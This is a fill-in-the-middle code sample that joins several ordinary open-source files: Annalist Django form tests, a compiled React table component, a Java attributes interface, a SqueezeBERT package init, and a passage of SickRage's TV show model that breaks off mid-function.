test_post_new_view_missing_id(self): f = view_view_form_data( view_id="", action="new", update="RecordView" ) u 
= entitydata_edit_url("new", "testcoll", layout.VIEW_TYPEID, view_id="View_view") # log.info("u %s, f %r"%(u,f)) r = self.client.post(u, f) # print r.content self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") self.assertContains(r, "<h3>%s</h3>"%(message.RECORD_VIEW_ID,)) # Test context self._check_default_view_context_fields(r, action="new", view_id="", orig_view_id="orig_view_id", view_label=None, view_entity_type="annal:View", ) return def test_post_new_view_invalid_id(self): f = view_view_form_data( view_id="!badview", orig_id="orig_view_id", action="new", update="RecordView" ) u = entitydata_edit_url("new", "testcoll", layout.VIEW_TYPEID, view_id="View_view") # log.info("u %s, f %r"%(u,f)) r = self.client.post(u, f) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") self.assertContains(r, "<h3>%s</h3>"%(message.RECORD_VIEW_ID,)) # Check context self._check_default_view_context_fields(r, action="new", view_id="!badview", orig_view_id="orig_view_id", view_label=None, view_entity_type="annal:View", ) return # -------- copy view -------- def test_post_copy_view(self): self.assertFalse(RecordView.exists(self.testcoll, "copyview")) f = view_view_form_data( view_id="copyview", orig_id="Default_view", orig_coll="_annalist_site", action="copy", update="RecordView" ) u = entitydata_edit_url( "copy", "testcoll", layout.VIEW_TYPEID, entity_id="Default_view", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") self.assertEqual(r['location'], self.continuation_url) # Check that new record type exists self._check_recordview_values("copyview", update="RecordView") return def test_post_copy_view_cancel(self): self.assertFalse(RecordView.exists(self.testcoll, "copyview")) f = view_view_form_data( view_id="copyview", orig_id="Default_view", action="copy", cancel="Cancel", update="RecordView" ) u = entitydata_edit_url( "copy", "testcoll", layout.VIEW_TYPEID, entity_id="Default_view", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") self.assertEqual(r['location'], self.continuation_url) # Check that target record view still does not exist self.assertFalse(RecordView.exists(self.testcoll, "copyview")) return def test_post_copy_view_missing_id(self): f = view_view_form_data( view_id="", orig_id="Default_view", action="copy", update="Updated RecordView" ) u = entitydata_edit_url( "copy", "testcoll", layout.VIEW_TYPEID, entity_id="Default_view", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") self.assertContains(r, "<h3>%s</h3>"%(message.RECORD_VIEW_ID,)) # Test context self._check_default_view_context_fields(r, action="copy", view_id="", orig_view_id="Default_view", view_label=None, view_entity_type="annal:View", update="Updated RecordView" ) return def test_post_copy_view_invalid_id(self): f = view_view_form_data( view_id="!badview", orig_id="Default_view", action="copy", update="Updated RecordView" ) u = entitydata_edit_url( "copy", "testcoll", layout.VIEW_TYPEID, entity_id="Default_view", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") self.assertContains(r, "<h3>%s</h3>"%(message.RECORD_VIEW_ID,)) # Test context self._check_default_view_context_fields(r, action="copy", 
view_id="!badview", orig_view_id="Default_view",<|fim▁hole|> view_label=None, view_entity_type="annal:View", update="Updated RecordView" ) return # -------- edit view -------- def test_post_edit_view(self): self._create_record_view("editview") self._check_recordview_values("editview") f = view_view_form_data( view_id="editview", orig_id="editview", action="edit", view_entity_type="annal:View", update="Updated RecordView" ) u = entitydata_edit_url( "edit", "testcoll", layout.VIEW_TYPEID, entity_id="editview", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") self.assertEqual(r['location'], self.continuation_url) # Check that new record view exists self._check_recordview_values("editview", update="Updated RecordView") return def test_post_edit_view_new_id(self): self._create_record_view("editview1") self._check_recordview_values("editview1") f = view_view_form_data( view_id="editview2", orig_id="editview1", action="edit", view_entity_type="annal:View", update="Updated RecordView" ) u = entitydata_edit_url( "edit", "testcoll", layout.VIEW_TYPEID, entity_id="editview1", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") self.assertEqual(r['location'], self.continuation_url) # Check that new record view exists and old does not self.assertFalse(RecordView.exists(self.testcoll, "editview1")) self._check_recordview_values("editview2", update="Updated RecordView") return def test_post_edit_view_cancel(self): self._create_record_view("editview") self._check_recordview_values("editview") f = view_view_form_data( view_id="editview", orig_id="editview", action="edit", cancel="Cancel", view_entity_type="annal:View", update="Updated RecordView" ) u = entitydata_edit_url( "edit", "testcoll", layout.VIEW_TYPEID, entity_id="editview", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") self.assertEqual(r['location'], self.continuation_url) # Check that target record view still does not exist and unchanged self._check_recordview_values("editview") return def test_post_edit_view_missing_id(self): self._create_record_view("editview") self._check_recordview_values("editview") # Form post with ID missing f = view_view_form_data( view_id="", orig_id="editview", action="edit", view_entity_type="annal:View", update="Updated RecordView" ) u = entitydata_edit_url( "edit", "testcoll", layout.VIEW_TYPEID, entity_id="editview", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") self.assertContains(r, "<h3>%s</h3>"%(message.RECORD_VIEW_ID,)) # Test context self._check_default_view_context_fields(r, action="edit", view_id="", orig_view_id="editview", view_label=None, view_entity_type="annal:View", update="Updated RecordView" ) # Check original data is unchanged self._check_recordview_values("editview") return def test_post_edit_view_invalid_id(self): self._create_record_view("editview") self._check_recordview_values("editview") # Form post with invalid ID f = view_view_form_data( view_id="!badview", orig_id="editview", action="edit", update="Updated RecordView" ) u = entitydata_edit_url( "edit", "testcoll", layout.VIEW_TYPEID, entity_id="editview", view_id="View_view" ) r = self.client.post(u, f) 
self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") self.assertContains(r, "<h3>%s</h3>"%(message.RECORD_VIEW_ID,)) # Test context self._check_default_view_context_fields(r, action="edit", view_id="!badview", orig_view_id="editview", view_label=None, view_entity_type="annal:View", update="Updated RecordView" ) # Check original data is unchanged self._check_recordview_values("editview") return def test_post_edit_view_field_placement_missing(self): self._create_record_view("editview") self._check_recordview_values("editview") f = view_view_form_data( view_id="editview", orig_id="editview", action="edit", update="Updated RecordView", field3_placement="" ) u = entitydata_edit_url( "edit", "testcoll", layout.VIEW_TYPEID, entity_id="editview", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") self.assertEqual(r['location'], self.continuation_url) # Check that new record view exists self._check_recordview_values("editview", update="Updated RecordView", field3_placement="") return # ----------------------------------------------------------------------------- # Form response tests for view descriptions with repeating fields # ----------------------------------------------------------------------------- def test_post_add_field(self): self._create_record_view("addfieldview") self._check_recordview_values("addfieldview") f = view_view_form_data( view_id="addfieldview", orig_id="addfieldview", action="edit", view_entity_type="annal:View", add_field=True ) u = entitydata_edit_url( action="edit", coll_id="testcoll", type_id=layout.VIEW_TYPEID, entity_id="addfieldview", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") v = u + "?continuation_url=" + self.continuation_path self.assertEqual(v, r['location']) # Retrieve from redirect location, and test result r = self.client.get(v) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") # Test context self._check_default_view_context_fields(r, action="edit", add_field=True, view_id="addfieldview", orig_view_id="addfieldview", view_label=None, view_entity_type="annal:View", ) return def test_post_remove_field(self): self._create_record_view("removefieldview") self._check_recordview_values("removefieldview") f = view_view_form_data( view_id="removefieldview", orig_id="removefieldview", action="edit", remove_fields=['3'] ) u = entitydata_edit_url( action="edit", coll_id="testcoll", type_id=layout.VIEW_TYPEID, entity_id="removefieldview", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") v = u + "?continuation_url=" + self.continuation_path self.assertEqual(v, r['location']) # Retrieve from redirect location, and test result r = self.client.get(v) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") # Test context self._check_default_view_context_fields(r, action="edit", remove_field=True, view_id="removefieldview", orig_view_id="removefieldview", view_label=None, view_entity_type="annal:View", ) return def test_post_remove_no_field_selected(self): self._create_record_view("removefieldview") self._check_recordview_values("removefieldview") f = view_view_form_data( view_id="removefieldview", orig_id="removefieldview", action="edit", remove_fields="no-selection" ) 
u = entitydata_edit_url( action="edit", coll_id="testcoll", type_id=layout.VIEW_TYPEID, entity_id="removefieldview", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") self.assertContains(r, "<h3>%s</h3>"%(message.REMOVE_FIELD_ERROR,)) self.assertContains(r, """<p class="messages">%s</p>"""%(message.NO_FIELD_SELECTED,)) # Test context self._check_default_view_context_fields(r, action="edit", view_id="removefieldview", orig_view_id="removefieldview", view_label=None, view_entity_type="annal:View", ) return def test_post_move_up_fields(self): self._create_record_view("movefieldview") self._check_recordview_values("movefieldview") f = view_view_form_data( view_id="movefieldview", orig_id="movefieldview", action="edit", view_entity_type="annal:View", move_up_fields=["2","3"] ) u = entitydata_edit_url( action="edit", coll_id="testcoll", type_id=layout.VIEW_TYPEID, entity_id="movefieldview", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") v = u + "?continuation_url=" + self.continuation_path self.assertEqual(v, r['location']) # Retrieve from redirect location, and test result r = self.client.get(v) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") # Test context self._check_default_view_context_fields(r, action="edit", move_up=[2,3], view_id="movefieldview", orig_view_id="movefieldview", view_label=None, view_entity_type="annal:View", ) return def test_post_move_down_fields(self): self._create_record_view("movefieldview") self._check_recordview_values("movefieldview") f = view_view_form_data( view_id="movefieldview", orig_id="movefieldview", action="edit", view_entity_type="annal:View", move_down_fields=["1"] ) u = entitydata_edit_url( action="edit", coll_id="testcoll", type_id=layout.VIEW_TYPEID, entity_id="movefieldview", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") v = u + "?continuation_url=" + self.continuation_path self.assertEqual(v, r['location']) # Retrieve from redirect location, and test result r = self.client.get(v) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") return # ----------------------------------------------------------------------------- # # ConfirmRecordViewDeleteTests tests for completion of record deletion # # ----------------------------------------------------------------------------- class ConfirmRecordViewDeleteTests(AnnalistTestCase): """ Tests for record type deletion on response to confirmation form """ def setUp(self): init_annalist_test_site() self.testsite = Site(TestBaseUri, TestBaseDir) self.testcoll = Collection.create(self.testsite, "testcoll", collection_create_values("testcoll")) # Login and permissions create_test_user(self.testcoll, "testuser", "testpassword") self.client = Client(HTTP_HOST=TestHost) loggedin = self.client.login(username="testuser", password="testpassword") self.assertTrue(loggedin) return def tearDown(self): return def test_CollectionActionViewTest(self): self.assertEqual(RecordViewDeleteConfirmedView.__name__, "RecordViewDeleteConfirmedView", "Check RecordViewDeleteConfirmedView class name") return # NOTE: test_collection checks the appropriate response from clicking the delete button, # so here only need to test completion code. 
def test_post_confirmed_remove_view(self): t = RecordView.create(self.testcoll, "deleteview", recordview_create_values("deleteview")) self.assertTrue(RecordView.exists(self.testcoll, "deleteview")) # Submit positive confirmation u = TestHostUri + recordview_edit_url("delete", "testcoll") f = recordview_delete_confirm_form_data("deleteview") r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") v = collection_edit_url("testcoll") e1 = "info_head=" e2 = "info_message=" e3 = "deleteview" e4 = "testcoll" self.assertIn(v, r['location']) self.assertIn(e1, r['location']) self.assertIn(e2, r['location']) self.assertIn(e3, r['location']) # Confirm deletion self.assertFalse(RecordView.exists(self.testcoll, "deleteview")) return # End. #........1.........2.........3.........4.........5.........6.........7.........8<|fim▁end|>
<|file_name|>tableBody.js<|end_file_name|><|fim▁begin|>'use strict'; Object.defineProperty(exports, "__esModule", { value: true }); exports.default = undefined; var _style = require('antd/lib/icon/style'); var _icon = require('antd/lib/icon'); var _icon2 = _interopRequireDefault(_icon); var _extends2 = require('babel-runtime/helpers/extends'); var _extends3 = _interopRequireDefault(_extends2); var _getPrototypeOf = require('babel-runtime/core-js/object/get-prototype-of'); var _getPrototypeOf2 = _interopRequireDefault(_getPrototypeOf); var _classCallCheck2 = require('babel-runtime/helpers/classCallCheck'); var _classCallCheck3 = _interopRequireDefault(_classCallCheck2); var _createClass2 = require('babel-runtime/helpers/createClass'); var _createClass3 = _interopRequireDefault(_createClass2); var _possibleConstructorReturn2 = require('babel-runtime/helpers/possibleConstructorReturn'); var _possibleConstructorReturn3 = _interopRequireDefault(_possibleConstructorReturn2); var _inherits2 = require('babel-runtime/helpers/inherits'); var _inherits3 = _interopRequireDefault(_inherits2); var _class, _temp; var _react = require('react'); var _react2 = _interopRequireDefault(_react); var _tableRow = require('./tableRow'); var _tableRow2 = _interopRequireDefault(_tableRow); function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } var TBody = (_temp = _class = function (_React$Component) { (0, _inherits3.default)(TBody, _React$Component); function TBody(props) { (0, _classCallCheck3.default)(this, TBody); var _this = (0, _possibleConstructorReturn3.default)(this, (TBody.__proto__ || (0, _getPrototypeOf2.default)(TBody)).call(this, props)); _this.state = {}; return _this;<|fim▁hole|> key: 'render', value: function render() { var _this2 = this; var _props = this.props; var dataSource = _props.dataSource; var _props$locale = _props.locale; var locale = _props$locale === undefined ? {} : _props$locale; return _react2.default.createElement( 'div', { className: 'nd-body' }, dataSource.length ? _react2.default.createElement( 'div', null, dataSource.map(function (item, dataIndex) { return _react2.default.createElement(_tableRow2.default, (0, _extends3.default)({ key: dataIndex, data: item }, _this2.props)); }) ) : _react2.default.createElement( 'div', null, _react2.default.createElement(_icon2.default, { type: 'frown' }), ' ', locale.no_data || 'No Data' ) ); } }]); return TBody; }(_react2.default.Component), _class.propTypes = { dataSource: _react.PropTypes.array.isRequired, locale: _react.PropTypes.object }, _temp); exports.default = TBody; module.exports = exports['default'];<|fim▁end|>
} (0, _createClass3.default)(TBody, [{
<|file_name|>DynamicAttributes.java<|end_file_name|><|fim▁begin|>/** * Copyright 2014 Jordan Zimmerman * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package io.soabase.core.features.attributes; import io.soabase.core.listening.Listenable; import java.util.Collection; /** * Gives access to dynamic attributes. The various get methods return * the current value for the given key after applying overrides and scopes, etc. * Always call the methods to get the current value as it may change during runtime. */<|fim▁hole|> public String getAttribute(String key, String defaultValue); public boolean getAttributeBoolean(String key); public boolean getAttributeBoolean(String key, boolean defaultValue); public int getAttributeInt(String key); public int getAttributeInt(String key, int defaultValue); public long getAttributeLong(String key); public long getAttributeLong(String key, long defaultValue); public double getAttributeDouble(String key); public double getAttributeDouble(String key, double defaultValue); public void temporaryOverride(String key, boolean value); public void temporaryOverride(String key, int value); public void temporaryOverride(String key, long value); public void temporaryOverride(String key, double value); public void temporaryOverride(String key, String value); public boolean removeOverride(String key); public Collection<String> getKeys(); public Listenable<DynamicAttributeListener> getListenable(); }<|fim▁end|>
public interface DynamicAttributes { public String getAttribute(String key);
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|># flake8: noqa # There's no way to ignore "F401 '...' imported but unused" warnings in this # module, but to preserve other warnings. So, don't check this module at all. # Copyright 2020 The HuggingFace Team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from typing import TYPE_CHECKING from ...file_utils import _LazyModule, is_tokenizers_available, is_torch_available _import_structure = { "configuration_squeezebert": ["SQUEEZEBERT_PRETRAINED_CONFIG_ARCHIVE_MAP", "SqueezeBertConfig"], "tokenization_squeezebert": ["SqueezeBertTokenizer"], } if is_tokenizers_available(): _import_structure["tokenization_squeezebert_fast"] = ["SqueezeBertTokenizerFast"] if is_torch_available(): _import_structure["modeling_squeezebert"] = [ "SQUEEZEBERT_PRETRAINED_MODEL_ARCHIVE_LIST", "SqueezeBertForMaskedLM", "SqueezeBertForMultipleChoice", "SqueezeBertForQuestionAnswering", "SqueezeBertForSequenceClassification", "SqueezeBertForTokenClassification", "SqueezeBertModel", "SqueezeBertModule", "SqueezeBertPreTrainedModel", ] <|fim▁hole|>if TYPE_CHECKING: from .configuration_squeezebert import SQUEEZEBERT_PRETRAINED_CONFIG_ARCHIVE_MAP, SqueezeBertConfig from .tokenization_squeezebert import SqueezeBertTokenizer if is_tokenizers_available(): from .tokenization_squeezebert_fast import SqueezeBertTokenizerFast if is_torch_available(): from .modeling_squeezebert import ( SQUEEZEBERT_PRETRAINED_MODEL_ARCHIVE_LIST, SqueezeBertForMaskedLM, SqueezeBertForMultipleChoice, SqueezeBertForQuestionAnswering, SqueezeBertForSequenceClassification, SqueezeBertForTokenClassification, SqueezeBertModel, SqueezeBertModule, SqueezeBertPreTrainedModel, ) else: import sys sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure, module_spec=__spec__)<|fim▁end|>
<|file_name|>tv.py<|end_file_name|><|fim▁begin|># Author: Nic Wolfe <[email protected]> # URL: http://code.google.com/p/sickbeard/ # # This file is part of SickRage. # # SickRage is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # SickRage is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with SickRage. If not, see <http://www.gnu.org/licenses/>. from __future__ import with_statement import os.path import datetime import threading import re import glob import stat import traceback import sickbeard import xml.etree.cElementTree as etree from name_parser.parser import NameParser, InvalidNameException, InvalidShowException import subliminal try: from send2trash import send2trash except ImportError: pass from imdb import imdb from sickbeard import db from sickbeard import helpers, exceptions, logger from sickbeard.exceptions import ex from sickbeard import image_cache from sickbeard import notifiers from sickbeard import postProcessor from sickbeard import subtitles from sickbeard import history from sickbeard.blackandwhitelist import BlackAndWhiteList from sickbeard import sbdatetime from sickbeard import network_timezones from sickbeard.indexers.indexer_config import INDEXER_TVRAGE from dateutil.tz import * from sickbeard import encodingKludge as ek from common import Quality, Overview, statusStrings from common import DOWNLOADED, SNATCHED, SNATCHED_PROPER, SNATCHED_BEST, ARCHIVED, IGNORED, UNAIRED, WANTED, SKIPPED, \ UNKNOWN, FAILED from common import NAMING_DUPLICATE, NAMING_EXTEND, NAMING_LIMITED_EXTEND, NAMING_SEPARATED_REPEAT, \ NAMING_LIMITED_EXTEND_E_PREFIXED import shutil import shutil_custom shutil.copyfile = shutil_custom.copyfile_custom def dirty_setter(attr_name): def wrapper(self, val): if getattr(self, attr_name) != val: setattr(self, attr_name, val) self.dirty = True return wrapper class TVShow(object): def __init__(self, indexer, indexerid, lang=""): self._indexerid = int(indexerid) self._indexer = int(indexer) self._name = "" self._imdbid = "" self._network = "" self._genre = "" self._classification = "" self._runtime = 0 self._imdb_info = {} self._quality = int(sickbeard.QUALITY_DEFAULT) self._flatten_folders = int(sickbeard.FLATTEN_FOLDERS_DEFAULT) self._status = "Unknown" self._airs = "" self._startyear = 0 self._paused = 0 self._air_by_date = 0 self._subtitles = int(sickbeard.SUBTITLES_DEFAULT) self._dvdorder = 0 self._archive_firstmatch = 0 self._lang = lang self._last_update_indexer = 1 self._sports = 0 self._anime = 0 self._scene = 0 self._rls_ignore_words = "" self._rls_require_words = "" self._default_ep_status = SKIPPED self.dirty = True self._location = "" self.lock = threading.Lock() self.isDirGood = False self.episodes = {} self.nextaired = "" self.release_groups = None otherShow = helpers.findCertainShow(sickbeard.showList, self.indexerid) if otherShow != None: raise exceptions.MultipleShowObjectsException("Can't create a show if it already exists") self.loadFromDB() name = property(lambda self: self._name, dirty_setter("_name")) indexerid = property(lambda self: self._indexerid, dirty_setter("_indexerid")) indexer = 
property(lambda self: self._indexer, dirty_setter("_indexer")) # location = property(lambda self: self._location, dirty_setter("_location")) imdbid = property(lambda self: self._imdbid, dirty_setter("_imdbid")) network = property(lambda self: self._network, dirty_setter("_network")) genre = property(lambda self: self._genre, dirty_setter("_genre")) classification = property(lambda self: self._classification, dirty_setter("_classification")) runtime = property(lambda self: self._runtime, dirty_setter("_runtime")) imdb_info = property(lambda self: self._imdb_info, dirty_setter("_imdb_info")) quality = property(lambda self: self._quality, dirty_setter("_quality")) flatten_folders = property(lambda self: self._flatten_folders, dirty_setter("_flatten_folders")) status = property(lambda self: self._status, dirty_setter("_status")) airs = property(lambda self: self._airs, dirty_setter("_airs")) startyear = property(lambda self: self._startyear, dirty_setter("_startyear")) paused = property(lambda self: self._paused, dirty_setter("_paused")) air_by_date = property(lambda self: self._air_by_date, dirty_setter("_air_by_date")) subtitles = property(lambda self: self._subtitles, dirty_setter("_subtitles")) dvdorder = property(lambda self: self._dvdorder, dirty_setter("_dvdorder")) archive_firstmatch = property(lambda self: self._archive_firstmatch, dirty_setter("_archive_firstmatch")) lang = property(lambda self: self._lang, dirty_setter("_lang")) last_update_indexer = property(lambda self: self._last_update_indexer, dirty_setter("_last_update_indexer")) sports = property(lambda self: self._sports, dirty_setter("_sports")) anime = property(lambda self: self._anime, dirty_setter("_anime")) scene = property(lambda self: self._scene, dirty_setter("_scene")) rls_ignore_words = property(lambda self: self._rls_ignore_words, dirty_setter("_rls_ignore_words")) rls_require_words = property(lambda self: self._rls_require_words, dirty_setter("_rls_require_words")) default_ep_status = property(lambda self: self._default_ep_status, dirty_setter("_default_ep_status")) @property def is_anime(self): if int(self.anime) > 0: return True else: return False @property def is_sports(self): if int(self.sports) > 0: return True else: return False @property def is_scene(self): if int(self.scene) > 0: return True else: return False @property def network_logo_name(self): return self.network.replace(u'\u00C9', 'e').replace(u'\u00E9', 'e').lower() def _getLocation(self): # no dir check needed if missing show dirs are created during post-processing if sickbeard.CREATE_MISSING_SHOW_DIRS: return self._location if ek.ek(os.path.isdir, self._location): return self._location else: raise exceptions.ShowDirNotFoundException("Show folder doesn't exist, you shouldn't be using it") def _setLocation(self, newLocation): logger.log(u"Setter sets location to " + newLocation, logger.DEBUG) # Don't validate dir if user wants to add shows without creating a dir if sickbeard.ADD_SHOWS_WO_DIR or ek.ek(os.path.isdir, newLocation): dirty_setter("_location")(self, newLocation) self._isDirGood = True else: raise exceptions.NoNFOException("Invalid folder for the show!") location = property(_getLocation, _setLocation) # delete references to anything that's not in the internal lists def flushEpisodes(self): for curSeason in self.episodes: for curEp in self.episodes[curSeason]: myEp = self.episodes[curSeason][curEp] self.episodes[curSeason][curEp] = None del myEp def getAllEpisodes(self, season=None, has_location=False): sql_selection = "SELECT season, 
episode, " # subselection to detect multi-episodes early, share_location > 0 sql_selection = sql_selection + " (SELECT COUNT (*) FROM tv_episodes WHERE showid = tve.showid AND season = tve.season AND location != '' AND location = tve.location AND episode != tve.episode) AS share_location " sql_selection = sql_selection + " FROM tv_episodes tve WHERE showid = " + str(self.indexerid) if season is not None: sql_selection = sql_selection + " AND season = " + str(season) if has_location: sql_selection = sql_selection + " AND location != '' " # need ORDER episode ASC to rename multi-episodes in order S01E01-02 sql_selection = sql_selection + " ORDER BY season ASC, episode ASC" myDB = db.DBConnection() results = myDB.select(sql_selection) ep_list = [] for cur_result in results: cur_ep = self.getEpisode(int(cur_result["season"]), int(cur_result["episode"])) if not cur_ep: continue cur_ep.relatedEps = [] if cur_ep.location: # if there is a location, check if it's a multi-episode (share_location > 0) and put them in relatedEps if cur_result["share_location"] > 0: related_eps_result = myDB.select( "SELECT * FROM tv_episodes WHERE showid = ? AND season = ? AND location = ? AND episode != ? ORDER BY episode ASC", [self.indexerid, cur_ep.season, cur_ep.location, cur_ep.episode]) for cur_related_ep in related_eps_result: related_ep = self.getEpisode(int(cur_related_ep["season"]), int(cur_related_ep["episode"])) if related_ep and related_ep not in cur_ep.relatedEps: cur_ep.relatedEps.append(related_ep) ep_list.append(cur_ep) return ep_list def getEpisode(self, season=None, episode=None, file=None, noCreate=False, absolute_number=None, forceUpdate=False): # if we get an anime get the real season and episode if self.is_anime and absolute_number and not season and not episode: myDB = db.DBConnection() sql = "SELECT * FROM tv_episodes WHERE showid = ? AND absolute_number = ? 
AND season != 0" sqlResults = myDB.select(sql, [self.indexerid, absolute_number]) if len(sqlResults) == 1: episode = int(sqlResults[0]["episode"]) season = int(sqlResults[0]["season"]) logger.log( "Found episode by absolute_number %s which is S%02dE%02d" % (absolute_number, season, episode), logger.DEBUG) elif len(sqlResults) > 1: logger.log("Multiple entries for absolute number: " + str( absolute_number) + " in show: " + self.name + " found ", logger.ERROR) return None else: logger.log( "No entries for absolute number: " + str(absolute_number) + " in show: " + self.name + " found.", logger.DEBUG) return None if not season in self.episodes: self.episodes[season] = {} if not episode in self.episodes[season] or self.episodes[season][episode] is None: if noCreate: return None logger.log(str(self.indexerid) + u": An object for episode S%02dE%02d didn't exist in the cache, trying to create it" % (season, episode), logger.DEBUG) if file: ep = TVEpisode(self, season, episode, file) else: ep = TVEpisode(self, season, episode) if ep != None: self.episodes[season][episode] = ep return self.episodes[season][episode] def should_update(self, update_date=datetime.date.today()): # if show is not 'Ended' always update (status 'Continuing') if self.status == 'Continuing': return True # run logic against the current show latest aired and next unaired data to see if we should bypass 'Ended' status graceperiod = datetime.timedelta(days=30) last_airdate = datetime.date.fromordinal(1) # get latest aired episode to compare against today - graceperiod and today + graceperiod myDB = db.DBConnection() sql_result = myDB.select( "SELECT * FROM tv_episodes WHERE showid = ? AND season > '0' AND airdate > '1' AND status > '1' ORDER BY airdate DESC LIMIT 1", [self.indexerid]) if sql_result: last_airdate = datetime.date.fromordinal(sql_result[0]['airdate']) if last_airdate >= (update_date - graceperiod) and last_airdate <= (update_date + graceperiod): return True # get next upcoming UNAIRED episode to compare against today + graceperiod sql_result = myDB.select( "SELECT * FROM tv_episodes WHERE showid = ? 
AND season > '0' AND airdate > '1' AND status = '1' ORDER BY airdate ASC LIMIT 1", [self.indexerid]) if sql_result: next_airdate = datetime.date.fromordinal(sql_result[0]['airdate']) if next_airdate <= (update_date + graceperiod): return True last_update_indexer = datetime.date.fromordinal(self.last_update_indexer) # in the first year after ended (last airdate), update every 30 days if (update_date - last_airdate) < datetime.timedelta(days=450) and ( update_date - last_update_indexer) > datetime.timedelta(days=30): return True return False def writeShowNFO(self): result = False if not ek.ek(os.path.isdir, self._location): logger.log(str(self.indexerid) + u": Show dir doesn't exist, skipping NFO generation") return False logger.log(str(self.indexerid) + u": Writing NFOs for show", logger.DEBUG) for cur_provider in sickbeard.metadata_provider_dict.values(): result = cur_provider.create_show_metadata(self) or result return result def writeMetadata(self, show_only=False): if not ek.ek(os.path.isdir, self._location): logger.log(str(self.indexerid) + u": Show dir doesn't exist, skipping NFO generation") return self.getImages() self.writeShowNFO() if not show_only: self.writeEpisodeNFOs() def writeEpisodeNFOs(self): if not ek.ek(os.path.isdir, self._location): logger.log(str(self.indexerid) + u": Show dir doesn't exist, skipping NFO generation") return logger.log(str(self.indexerid) + u": Writing NFOs for all episodes", logger.DEBUG) myDB = db.DBConnection() sqlResults = myDB.select("SELECT * FROM tv_episodes WHERE showid = ? AND location != ''", [self.indexerid]) for epResult in sqlResults: logger.log(str(self.indexerid) + u": Retrieving/creating episode S%02dE%02d" % (epResult["season"], epResult["episode"]), logger.DEBUG) curEp = self.getEpisode(epResult["season"], epResult["episode"]) if not curEp: continue curEp.createMetaFiles() def updateMetadata(self): if not ek.ek(os.path.isdir, self._location): logger.log(str(self.indexerid) + u": Show dir doesn't exist, skipping NFO generation") return self.updateShowNFO() def updateShowNFO(self): result = False if not ek.ek(os.path.isdir, self._location): logger.log(str(self.indexerid) + u": Show dir doesn't exist, skipping NFO generation") return False logger.log(str(self.indexerid) + u": Updating NFOs for show with new indexer info") for cur_provider in sickbeard.metadata_provider_dict.values(): result = cur_provider.update_show_indexer_metadata(self) or result return result # find all media files in the show folder and create episodes for as many as possible def loadEpisodesFromDir(self): if not ek.ek(os.path.isdir, self._location): logger.log(str(self.indexerid) + u": Show dir doesn't exist, not loading episodes from disk", logger.DEBUG) return logger.log(str(self.indexerid) + u": Loading all episodes from the show directory " + self._location, logger.DEBUG) # get file list mediaFiles = helpers.listMediaFiles(self._location) logger.log(u"%s: Found files: %s" % (self.indexerid, mediaFiles), logger.DEBUG) # create TVEpisodes from each media file (if possible) sql_l = [] for mediaFile in mediaFiles: parse_result = None curEpisode = None logger.log(str(self.indexerid) + u": Creating episode from " + mediaFile, logger.DEBUG) try: curEpisode = self.makeEpFromFile(ek.ek(os.path.join, self._location, 